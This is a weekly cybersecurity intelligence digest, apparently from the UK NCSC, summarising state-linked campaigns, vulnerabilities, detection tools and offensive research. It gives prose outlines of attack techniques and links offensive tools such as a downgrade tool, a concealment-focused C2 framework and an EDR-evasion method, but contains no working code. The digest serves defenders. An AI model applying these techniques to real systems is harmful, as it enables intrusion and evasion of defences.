Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week nothing overly of note..
In the high-level this week:
Chevening India Cyber Security Fellowship - Chevening Awards announces - applications are open until October 10th - “The Chevening India Cyber Security Fellowship is aimed at mid-career professionals with demonstrable leadership potential in the field of cyber security or cyber policy in India. The fellowship is funded by the UK Foreign, Commonwealth, and Development Office.”
Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts - FBI and co state - “We have observed increasingly aggressive Iranian activity during this election cycle, specifically involving influence operations targeting the American public and cyber operations targeting presidential campaigns.”
Singapore's Operational Technology Cybersecurity Masterplan 2024 - Singapore Cyber Security Agency publishes - ”the Masterplan 2024 also outlines updates in the areas of People, Processes, and Technology to uplift cybersecurity postures as part of our continuous efforts to enhance the cybersecurity of sectors operating OT systems and technologies:
Enhance the OT Cybersecurity Talent Pipeline
Enhance Information Sharing and Reporting
Uplift OT Cybersecurity Resilience beyond CII
Establish an OT Cybersecurity Centre of Excellence and promote Secure-By-Deployment throughout the lifecycle of the OT systems”
A separate registry could be created for white hat hackers - Vedomosti reports from Russia - “The Federation Council, FSB, Ministry of Internal Affairs and information security (IS) companies are discussing the possibility of creating a register of white hackers and their certification. Vedomosti was told about this by three sources close to various information security companies. According to them, the issue was discussed at a closed meeting of department representatives in early August.”
Ukrainian hackers show war footage on Russian TV, source says - The Kyiv Independent news desk reports - "Hackers of Ukraine's military intelligence agency (HUR) broke into servers of several Russian television channels and broadcasted "objective videos about the war in Ukraine," a source in the agency told the Kyiv Independent on Aug. 22. According to the source, HUR's footage was displayed three times on prime-time TV channels: Pervouralsk TV, Eurasia 360, Eurasia Pervyi Kanal, and others. The targeted channels further reportedly included Lugansk 24, Pervyi Respublikanskyi, SpB, Oplot, TV-3, and Pervyi Rosiyskyi. Some of the targeted channels belong to Russian oligarch Andrey Komarov.”
Bureaucratic initiative redefines German law enforcement cyber operations - Binding Hook asserts - “Even though technically feasible, the federal legal framework provides no basis to clean up victim systems (such as the Emotet quarantining), a measure that would be considered an emergency response (Gefahrenabwehr, in German). Constitutionally, police action to avert danger is the remit of state police. The BKA, by contrast, is tasked with criminal prosecution. Under this distribution of power, operations that remove malware without prosecution objectives lack a clear legal framework. As the BKA’s actions in the Emotet case show, currently, the deactivation of malware is only possible in combination with efforts to secure evidence and is, legally, considered a side effect.”
FAA Equipment, Systems, and Network Information Security Protection - Federal Aviation Authority notifies - “This proposed rulemaking would impose new design standards to address cybersecurity threats for transport category airplanes, engines, and propellers. The intended effect of this proposed action is to standardize the FAA’s criteria for addressing cybersecurity threats, reducing certification costs and time while maintaining the same level of safety provided by current special conditions”
North Korean IT developers also develop domestic apps?... “Risk of abuse as a hacking tool” - Korean Broadcasting System reports - “The number of North Korean IT workers revealed by the National Intelligence Service is in the thousands worldwide,” - how is that insider threat programme?
[US] Army Cyber Command Foundry program provides data-centric military intelligence training - US Army announces - “ARCYBER G2 officials explained that they developed the training program to provide streamlined and comprehensive training material on the technical aspects of cyber-based knowledge. The courses extract the requisite technical elements of commercial and military courses and blend them with intelligence practices and tradecraft instrumental to wide-ranging cyber-related missions in support of U.S. Cyber Command priorities.”
Reporting on/from China
Tech war: China pumps up state subsidies for chip industry to counter US sanctions - South China Morning Post reports - “They showed that state backing for those companies amounted to 20.53 billion yuan (US$2.82 billion) last year, a 35 per cent increase from 2022.”
Huawei’s cloud unit sees Asia-Pacific as a vast market for AI products - South China Morning Post reports - “The cloud computing unit of Huawei Technologies sees Asia-Pacific as a potentially vast market for its artificial intelligence (AI) products, on the back of the 20-fold growth of its services in the region over the past four years in spite of US-led sanctions.”
Planned Huawei chip unit event stokes speculation over tech breakthrough - South China Morning Post reports - “A conference scheduled next month by Huawei Technologies’ secretive chip design unit HiSilicon has fanned speculation that a sanctions-busting breakthrough may be announced, triggering a surge in some China-listed tech stocks.”
Artificial intelligence
A benchmark for evaluating the cybersecurity capabilities and risks of language models - Stanford University publishes - “Cybench includes 40 professional-level Capture the Flag (CTF) tasks from 4 distinct CTF competitions, chosen to be recent, meaningful, and spanning a wide range of difficulties. We add subtasks, which break down a task into intermediary steps for more gradated evaluation, to 17 of the 40 tasks.”
The Global Race to Control A.I. - New York Times reports - “A.I. nationalism is part of a wider fracturing of the internet, where services vary based on local laws and national interests. What’s left is a new kind of tech world where the effects of A.I. in your life may just depend on where you live.”
Schumer Optimistic About Passing Federal AI Regulation This Year - Wall Street Journal reports - “We’re going to get a great AI package which keeps innovation as our North Star, hopefully through the Congress by the end of the year. We have great prospects,” said Senate Majority Leader Chuck Schumer (D., N.Y.).
California AI Regulation Bill Advances to Assembly Vote with Key Amendments - Campus Technology reports - “California’s "Safe and Secure Innovation for Frontier Artificial Intelligence Models Act" (Senate Bill 1047), spearheaded by Senator Scott Wiener (D-San Francisco), has cleared the Assembly Appropriations Committee with some significant amendments. The bill, aimed at establishing rigorous safety standards for large-scale artificial intelligence (AI) systems, is set for a vote on the Assembly floor on Aug. 20 and must pass by Aug. 31 to move forward”
South Africa National AI Policy Framework - South Africa government publishes - “The National Artificial Intelligence (AI) Policy Framework for South Africa (a first step in developing the National AI Policy) aims to promote the integration of Artificial Intelligence technologies to drive economic growth, enhance societal well-being, and position South Africa as a leader in AI innovation.”
Cyber proliferation
A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware - Lawfare asserts - “The inability of the international community to generate consensus on matters concerning fundamental human rights leaves UN member states with the choice of whether to sign the treaty without key human rights safeguards. However, if history is a teacher, it tells that mandating cross-border cooperation without mandating robust human rights commitments is not a tenable path forward in the fight against transnational cybercrime.”
Bounty Hunting
Pulaski County Man Sentenced for Cyber Intrusion and Aggravated Identity Theft - US Department of Justice reports - “The Defendant committed cyber intrusions, by hacking into state death registry systems to fake his own death to avoid paying his child support obligations. He also hacked into private businesses and attempted to sell access to networks on the dark web”
Member of Russian cybercrime group charged in Ohio - US Department of Justice reports - “According to court documents, Zolotarjovs is a member of a known cybercriminal organization that attacks computer systems of victims around the world. Among other things, the Russian cybercrime group steals victim data and threatens to release it unless the victim pays ransom in cryptocurrency. The group maintains a leaks and auction website that lists victim companies and offers stolen data for download.”
CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage - Financial Times reports - “the CrowdStrike executive said no vendor could “technically” guarantee that their own software would never cause a similar incident.” - might be true for vendors, but formal verification/methods might be a way..
InsurSec Can Drive An Effective Proactive Cybersecurity Strategy Says New Analyst Report - Omida and At-bay assert “Cyber insurance requirements are a major factor in how organizations make security-buying decisions. 43% of all respondents report that cyber insurance requirements are a “major or leading driver” of cybersecurity spend. The percentage is even higher among the largest organizations, among which 52% report that cyber insurance requirements are a major driver of spending” - Report
Reflections this week come from the quality of applied cyber security research occurring in academia as shown by the papers at USENIX Security '24 Summer. The breadth is impressive and on multiple fronts. From the quality of vulnerability research on show, with clearly a number of European Universities building impressive departments, through to the socio-technical aspects. Pull through of this and other research is where the value will be realised, but it doesn’t appear that there are the rapid pull-through from commercial partnerships exist on the level they should.
Think someone else would benefit? Share:
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday..
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
UAC-0020 (Vermin) using the topic of prisoners of war in the Kursk direction; new tool FIRMACHAGENT
Ukrainian government details this campaign where the distribution mechanism is not mentioned. The notable element is the deployment of new capability.
The mentioned archive contains a CHM file "list of vp dropped out. kursk.chm", which, among other things, contains an HTML file "part.html" containing JavaScript code, which in turn ensures the launch of an obfuscated PowerShell - script.
The PowerShell code is designed to download components of the SPECTR malicious program (it steals documents, screenshots, Internet browser data, etc.) and the new FIRMACHAGENT program ("chrome_updater.dll"; the main task of which is to download stolen data to the management server) ,
https://cert.gov.ua/article/6280422
Malpedia alleges the Russian link:
Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.
https://malpedia.caad.fkie.fraunhofer.de/actor/uac-0020
Reporting on China
Nothing this week
Reporting on North Korea
TodoSwift Disguises Malware Download Behind Bitcoin PDF
Christopher Lopez details this alleged North Korean campaign which is signed by a Hongkong firm Leap World Hongkong Limited.
A signed file named TodoTasks was uploaded to VirusTotal on 2024-07-24. This application shares several behaviors with malware we’ve seen that originated in North Korea (DPRK)—specifically the threat actor known as BlueNoroff—such as KandyKorn and RustBucket; given these commonalities, we believe this new malware—which we’re dubbing TodoSwift—is likely from the same source.
https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf
MoonPeak malware from North Korean actors unveils new details on attacker infrastructure
Asheer Malhotra, Guilherme Venere and Vitor Ventura detail this alleged North Korean campaign which apparently shows signs of development discipline in terms of test driven development.
Cisco Talos is exposing infrastructure we assess with high confidence is being used by a state-sponsored North Korean nexus of threat actors we track as “UAT-5394," including for staging, command and control (C2) servers, and test machines the threat actors use to test their implants.
Our analysis of the threat actor’s infrastructure indicates they pivoted across C2s and staging servers to set up new infrastructure and modify existing servers.
This campaign consists of distributing a variant of the open-source XenoRAT malware we're calling “MoonPeak,” a remote access trojan (RAT) being actively developed by the threat actor.
Analysis of XenoRAT against MoonPeak malware samples we’ve discovered so far illustrates the evolution of the malware family after it was forked by the threat actors.
https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/
Exploited Zero-day
Emma Brownstein alleges that North Korea were exploiting a zero-day known as CVE-2024-38193.
[We] discovered that the Lazarus group was exploiting a hidden security flaw in a crucial part of Windows called the AFD.sys driver. We also discovered that they used a special type of malware called Fudmodule to hide their activities from security software.
https://www.gendigital.com/blog/news/innovation/protecting-windows-users
this malware was also covered in February 2024 exploiting a different zero-day CVE-2024-21338 at the time in appid.sys. If reporting is accurate it shows they have at least one competent Windows driver vulnerability researcher and/or source of them.
Reporting on Iran
Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset
Joshua Miller, Georgi Mladenov, Andrew Northern, Greg Lesnewich and team detail this alleged Iranian campaign with notable victimology. That and the use of social engineering..
Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation.
The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link.
The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint.
The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration.
AnvilEcho contains all of TA453’s previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed.
GreenCharlie Infrastructure Linked to US Political Campaign Targeting
Insikt Group report on this alleged Iranian phishing related infrastructure.
From May 2024 onward, GreenCharlie registered a large number of dynamic DNS (DDNS) domains that have highly likely been used for targeted social engineering and phishing operations.
Insikt Group has established a direct infrastructure link between GreenCharlie clusters and malware referred to in open sources as GORBLE, which is reportedly linked to the targeting of US political candidates.
Analysis of Recorded Future Network Intelligence indicates that GreenCharlie threat actors likely used ProtonVPN or ProtonMail to enable their operations.
Iranian IP addresses were identified communicating with GreenCharlie infrastructure, which is likely part of the operation’s spearphishing component.
GreenCharlie’s victimology includes research and policy analysts, government officials, diplomats, and high-value strategic targets. While Insikt Group has not identified direct evidence of the targeting of US government and political campaign officials, open-source reporting has enabled us to establish a credible link.
GreenCharlie highly likely operates at the behest of the Islamic Revolutionary Guard Corps (IRGC); due to its persistent and strategic remit, it is also likely to be associated with the Intelligence Organization of the IRGC (IRGC-IO).
https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf
Reporting on Other Actors
Ransomware Tool Matrix: A resource containing all the tools each ransomware gangs uses
Will does what he does best in this release.
This repository contains a list of which tools each ransomware gang or extortionist gang uses
As defenders, we should exploit the fact that many of the tools used by these cybercriminals are often reused
We can threat hunt, deploy detections, and block these tools to eliminate the ability of adversaries to launch intrusions
This project will be updated as additional intelligence on ransomware gang TTPs is made available
https://github.com/BushidoUK/Ransomware-Tool-Matrix
https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
The Abuse of ITarian RMM by Dolphin Loader
Russian Panada evidences how legitimate code signed software is being integrated into malicious campaigns to avoid being detected / flagged as being malicious.
Some of the Dolphin Loader payloads currently have zero detections on VirusTotal. Why? Because it uses legitimate, EV-signed remote management software to deliver the final payload. This approach is very convenient for the loader’s developer because it eliminates the need to obtain an EV certificate and end up paying a significant amount of money out-of-pocket. Leveraging legitimate RMM software to deliver malware also offers numerous advantages:
Since RMM tools are meant to run quietly in the background because they monitor and manage systems, malware leveraging these tools can operate stealthily, avoiding detection by users.
RMM tools already include features for remote command or script execution, system monitoring, and data exfiltration. Attackers can use these built-in functionalities to control compromised systems.
Organizations trust their RMM solutions for IT operations. This trust can be exploited by attackers to deliver malware without raising immediate suspicion from users or IT staff.
https://russianpanda.com/The-Abuse-of-ITarian-RMM-by-Dolphin-Loader
Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments
Unit42 detail a campaign where the scale of scanning is the thing of note in this reporting, that and a trivially exploitable issue which can have devasting consequences,
Unit 42 researchers found an extortion campaign's cloud operation that successfully compromised and extorted multiple victim organizations. It did so by leveraging exposed environment variable files (.env files) that contained sensitive variables such as credentials belonging to various applications.
Multiple security missteps were present in the course of this campaign, including the following:
Exposing environment variables
Using long-lived credentials
Absence of least privilege architecture
The campaign operation set up its attack infrastructure within various organizations’ Amazon Web Services (AWS) environments and used that groundwork to scan more than 230 million unique targets for sensitive information.
https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
New Backdoor Targeting Taiwan Employs Stealthy Communications
Symantec detail this unattributed but interesting campaign which solely uses DNS for command and control. Also interesting that a recent web server vulnerability is apparently being used for initial access.
A previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan.
The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen.
..
The initial intrusion was likely through the exploit of a recently patched PHP vulnerability (CVE-2024-4577). The vulnerability is a CGI argument injection flaw affecting all versions of PHP installed on the Windows operating system. Successful exploitation of the vulnerability can lead to remote code execution.
https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns
Discovery
How we find and understand the latent compromises within our environments.
Windows Update log files
and Get-WindowsUpdateLog in PowerShell - to support detection of Windows Downdate (see below).
https://learn.microsoft.com/en-us/windows/deployment/update/windows-update-logs
ShellSweepX
Michael Haag releases a new capability to detect webshells - go forth and discover latent compromises!
ShellSweepX is an advanced, ML-powered web shell detection and analysis platform designed to enhance your organization's cybersecurity posture. By leveraging machine learning algorithms and YARA rules, ShellSweepX provides robust protection against web-based threats, particularly focusing on the identification and analysis of potential web shells.
https://github.com/splunk/ShellSweep/wiki/ShellSweepX
Notepad TabState artifact files analysis
AbdulRhman Alfaifi shows the value of keeping track of feature evolution of forensic opportunity.
On Windows 11, Notepad stores a cache of recently opened files. This cache contains valuable information, such as file paths, file contents, and other useful data. In this article, we will examine the structure of the Notepad cache and provide a custom parser to extract this information for forensic investigations.
https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/
Defence
How we proactively defend our environments.
Best practices for event logging and threat detection
ASD + 5EYES + friends co-seal these best practices.. go forth and log!
This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners:
United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA)
United Kingdom (UK) National Cyber Security Centre (NCSC-UK)
Canadian Centre for Cyber Security (CCCS) • New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ)
Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC)
The Republic of Korea National Intelligence Services (NIS) and NIS’s National Cyber Security Center (NCSC-Korea)
Singapore Cyber Security Agency (CSA) • The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).
..
There are four key factors to consider when pursuing logging best practices:
enterprise-approved event logging policy
centralised event log access and correlation
secure storage and event log integrity
detection strategy for relevant threats.
Exposing Security Observability Gaps in AWS Native Security Tooling
Jonathan Walker provides an interesting analysis..
https://www.securityrunners.io/post/exposing-security-observability-gaps-in-aws
ALBeast
Daniel Shechter details a clearly common configuration that organisations should ensure they are not affected by due to the potential for authentication implications.
First, the attacker creates their own ALB instance with authentication configured in their account. The attacker then uses this ALB to sign a token they fully control. Next, the attacker alters the ALB configuration and sets the issuer field to the victim's expected issuer. AWS subsequently signs the attacker's forged token with the victim's issuer. Finally, the attacker uses this minted token against the victim's application, bypassing both authentication and authorization.
..
On July 19th, 2024, AWS updated the authentication feature documentation to clarify best practices for Security Groups:“Also, as a security best practice we recommend you restrict your targets to only receive traffic from your Application Load Balancer. You can achieve this by configuring your targets' security group to reference the load balancer's security group ID.”
..
AWS does not consider issuer forging an ALB vulnerability and has stated that the service operates as intended. They highlighted the shared responsibility model, suggesting that customers should ensure their code and configurations are up-to-date to mitigate this issue.
..
[We identified over 15,000 (out of 371,000*) potentially vulnerable ALBs and applications using AWS ALB’s authentication feature. We’ve done our best to contact each affected organization with our findings and provide support where needed.
https://www.miggo.io/resources/albeast-security-advisory-alb-vulnerability
JA4 fingerprints and inter-request signals
Alex Bocharov and Adam Martinetti show an evolution in JA4 application which is fascinating..
JA4 Signals are inter-request features computed based on the last hour of all traffic that Cloudflare sees globally. On a daily basis, we analyze over 15 million unique JA4 fingerprints generated from more than 500 million user agents and billions of IP addresses. This breadth of data enables JA4 Signals to provide aggregated statistics that offer deeper insights into global traffic patterns – far beyond what single-request or connection fingerprinting can achieve. These signals are crucial for enhancing security measures, whether through simple firewall rules, Workers scripts, or advanced machine learning models.
https://blog.cloudflare.com/ja4-signals
Incident Writeups & Disclosures
How they got in and what they did.
Nothing this week
Vulnerability
Our attack surface.
SonicOS Improper Access Control
Vendor advisory.
An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
Global BGP Attacks that Evade Route Monitoring
Henry Birge-Lee, Maria Apostolaki and Jennifer Rexford detail a twist which may cause some detection headaches..
As the deployment of comprehensive Border Gateway Protocol (BGP) security measures is still in progress, BGP monitoring continues to play a critical role in protecting the Internet from routing attacks. Fundamentally, monitoring involves observing BGP feeds to detect suspicious announcements and taking defensive action. However, BGP monitoring relies on seeing the malicious BGP announcement in the first place! In this paper, we develop a novel attack that can hide itself from all state-of-the-art BGP monitoring systems we tested while affecting the entire Internet. The attack involves launching a sub-prefix hijack with the RFC-specified NO_EXPORT community attached to prevent networks with the malicious route installed from sending the route to BGP monitoring systems. We study the viability of this attack at four tier-1 networks and find all networks we studied were vulnerable to the attack. Finally, we propose a mitigation that significantly improves the robustness of the BGP monitoring ecosystem
https://arxiv.org/pdf/2408.09622
CVE-2024-7646: Ingress-NGINX Annotation Validation Bypass – A Deep Dive
Interesting vulnerability where \n can cause real pain. Don’t have a Kubernetes pod get compromised or it could get really painful.
The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects. Annotations in Kubernetes are used to attach arbitrary non-identifying metadata to objects. In the case of ingress-nginx, annotations are used to configure various behaviors of the ingress controller.
The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller’s credentials, which, in default configurations, has access to all secrets in the cluster.
..
The attacker creates an Ingress object with a specially crafted annotation that includes a carriage returns (
\r
) character to bypass validation. his allows the injection of unauthorized content and potential XSS attacks. For example:
https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/
MIFARE Classic: exposing the static encrypted nonce variant
Philippe Teuwen details a long time latent issue..
MIFARE Classic smart cards, developed and licensed by NXP, are widely used but have been subjected to numerous attacks over the years. Despite the introduction of new versions, these cards have remained vulnerable, even in card-only scenarios. In 2020, the FM11RF08S, a new variant of MIFARE Classic, was released by the leading Chinese manufacturer of unlicensed “MIFARE compatible” chips. This variant features specific countermeasures designed to thwart all known card-only attacks and is gradually gaining market share worldwide. In this paper, we present several attacks and unexpected findings regarding the FM11RF08S. Through empirical research, we discovered a hardware backdoor and successfully cracked its key. This backdoor enables any entity with knowledge of it to compromise all user-defined keys on these cards without prior knowledge, simply by accessing the card for a few minutes. Additionally, our investigation into older cards uncovered another hardware backdoor key that was common to several manufacturers.
https://eprint.iacr.org/2024/1275.pdf
Satellite bus vulnerabilities and their attacker paths and satellite firmware security threat analysis model
A Chinese analysis of various small satellites and their vulnerability.
Offense
Attack capability, techniques and trade-craft.
Windows Downdate
Alon Leviev releases a tool which we can expect adversarial use in 3..2..
A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities
https://github.com/SafeBreach-Labs/WindowsDowndate
Internal of Malice (Evil Network)
From China..
Internal of Malice (Evil Network) strives to implement a post-exploit infrastructure that is compatible with CS, MSF, and Sliver ecosystems, while providing higher scalability and concealment, and a set of engineering solutions.
C2 is more challenging than other areas, both in design and implementation.
What we want to try to design is the next generation of C2, a C2 framework that is more advanced in terms of interactive experience, scalability, port confrontation, traffic confrontation, etc.
Currently, v0.0.1 is still a long way from the complete form of the design goal. However, due to the development progress, we decided to accept the opinions from the community first. We cannot create the most advanced tools in isolation.
https://chainreactors.github.io/wiki/IoM/
A overview article has been published:
Summarizes some core design concepts of the next generation C2.
Rust is the ideal language for the next generation of C2, providing low-level operation capabilities, cross-platform compilation, and the ability to modify almost all features.
Modular, hot-swappable, and highly customizable implant design. We break down all functions into building blocks, and use the features and conditional compilation provided by Rust to achieve any combination.
Support webshell, and open up the underlying operation capabilities, reuse C2's plug-in ecosystem, such as the assembly-execute capability of the CLR ecosystem, Java's JNI and JVMTI, etc.
OPSEC first, and open OPSEC custom interfaces as much as possible
Highly controllable flow rate
From C2 to bootkit/rootkit
Listeners and servers should be decoupled, and the next generation of C2 should be distributed by nature
Compatibility with existing C2 ecosystems, such as CobaltStrike's BOF, Silver's Armory, etc.
......
Phishing in PWA Applications: A New Method Targeting Mobile Users
Jakub Osmani details an interesting and rather novel mobile offensive technique here. Now it has been reported we should expect an uptick..
Standard phishing delivery techniques were combined with a novel method of phishing; targeting Android and iOS users via PWAs, and on Android also WebAPKs.
Insidiously, installing a PWA/WebAPK application does not warn the victim about installing a third-party application.
On Android, these phishing WebAPKs even appear to have been installed from the Google Play store.
Most of the observed applications targeted clients of Czech banks, but we also observed one phishing app that targeted a Hungarian bank and another targeting a Georgian bank.
Based on the C&C servers utilized and backend infrastructure, we conclude that two different threat actors were operating the campaigns.
Thanks to our discovery of operator panels on different domains, we were able to notify the victims’ banks in order to protect them.
Sync+Sync: A Covert Channel Built on fsync with Storage
Qisheng Jiang and Chundong Wang show the subtly of what is possible..
We accordingly build a covert channel named Sync+Sync. Sync+Sync delivers a transmission bandwidth of 20,000 bits per second at an error rate of about 0.40% with an ordinary solid-state drive. Sync+Sync can be conducted in cross-disk partition, cross-file system, cross-container, cross-virtual machine, and even cross-disk drive fashions, without sharing data between programs. Next, we launch side-channel attacks with Sync+Sync and manage to precisely detect operations of a victim database (e.g., insert/update and B-Tree node split).
https://www.usenix.org/system/files/sec23winter-prepub-554-jiang.pdf
Hookchain
Helvio Junior highlights a gap in EDRs which will be interesting to see how quickly it is addressed.
Through a precise combination of IAT Hooking techniques, dynamic SSN resolution, and indirect system calls, HookChain redirects the execution flow of Windows subsystems in a way that remains invisible to the vigilant eyes of EDRs that only act on Ntdll.dll, without requiring changes to the source code of the applications and malwares involved.
https://github.com/helviojunior/hookchain/
Exploitation
What is being exploited.
CVE-2024-23897 Enabled Ransomware Attack on Indian Banks
Shwetanjali Rasal details the vulnerability exploited by this ransomware actor..
Brontoo Technology Solutions filed a report with CertIn (Indian Computer Emergency Response Team) which revealed that the attack originated from a misconfigured Jenkins server, setting off the chain of events. On further analysis, the threat actor leveraged CVE-2024-23897 to gain initial unauthorized access to the victim’s environment.
The gift that keeps on giving: A new opportunistic Log4j campaign
Andy Giron, Frederic Baguelin, Eslam Salem and Matt Mills highlights the risk from zombie vulnerabilities… the long tail of vulnerability even for high-profile vulnerabilities is indeed long.
Despite being over two years old, the Log4j vulnerability (Log4Shell) remains a persistent and evolving threat, as demonstrated by a recent opportunistic campaign leveraging it for crypto-mining and system compromise.
The attack uses obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.
The script establishes persistence, performs system reconnaissance, and exfiltrates data, maintaining control through multiple backdoors and encrypted communication channels.
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Atropos: Effective Fuzzing of Web Applications for Server-Side Vulnerabilities
Emre Güler , Sergej Schumilo , Moritz Schloegel , Nils Bars , Philipp Görz , Xinyi Xu , Cemal Kaygusuz , and Thorsten Holz show that tailored fuzzers can bring performance gains..
In this paper, we present ATROPOS, a snapshot-based, feedback-driven fuzzing method tailored for PHP-based web applications. Our approach considers the challenges associated with web applications, such as maintaining session state and generating highly structured inputs. Moreover, we propose a feedback mechanism to automatically infer the key-value structure used by web applications. Combined with eight new bug oracles, each covering a common class of vulnerabilities in server-side web applications, ATROPOS is the first approach to fuzz web applications effectively and efficiently. Our evaluation shows that ATROPOS significantly outperforms the current state of the art in web application testing. In particular, it finds, on average, at least 32% more bugs, while not reporting a single false positive on different test suites. When analyzing real-world web applications, we identify seven previously unknown vulnerabilities that can be exploited even by unauthenticated users.
https://www.usenix.org/system/files/sec23winter-prepub-167-guler.pdf
Dancer in the Dark: Synthesizing and Evaluating Polyglots for Blind Cross-Site Scripting
Robin Kirchner , Jonas Möller , Marius Musch , David Klein , Konrad Rieck and Martin Johns show niche bugs/techniques applied to a large enough population will get you something.
Based on these polyglots, we conduct a study of BXSS vulnerabilities on the Tranco Top 100,000 websites. We discover 20 vulnerabilities in 18 web-based backend systems. These findings demonstrate the efficacy of our detection approach and point at a largely unexplored attack surface in web security
https://www.usenix.org/system/files/sec23winter-prepub-226-kirchner-rev.pdf
Blade Razor 刃影
An AI-Driven Pentesting Solution from China
It has been verified that the application of LLM in penetration testing is feasible. The following four points have a decisive influence on the final effect:
For the selection of large models, it is sufficient as long as the parameters are large. There is no need to pay too much attention to whether the model has been fine-tuned for a specific field. The knowledge of a specific field can be solved by using rag.
RAG is equivalent to an external knowledge base that is independent of LLM. As long as the private knowledge base is complete enough, its "experience" will be rich enough.
Prompt words simulate various roles through prompt words, such as hacker, security researcher, security engineer, etc., so that LLM can better understand our needs.
The richer the external tool arsenal, the better
https://github.com/hangxin1940/bladerazor
C++ Unwind Exception Metadata: A Hidden Reverse Engineering Bonanza
Rolf Rolles provides a source of SRE insight..
this blog entry is about a different kind of C++ exception metadata: namely,
wind
andunwind
. In the remainder of this blog entry, we introducewind
andunwind
metadata -- what it is, and when and why the compiler inserts it -- before describing how to exploit it when reverse engineering C++ programs.
https://www.msreverseengineering.com/blog/2024/8/20/c-unwind-metadata-1
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
‘Your Data is Stolen and Encrypted’: The Ransomware Victim Experience
Artificial intelligence
Books
The Data Detective at the Carnival - Children’s book..
Events
Nothing this week
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.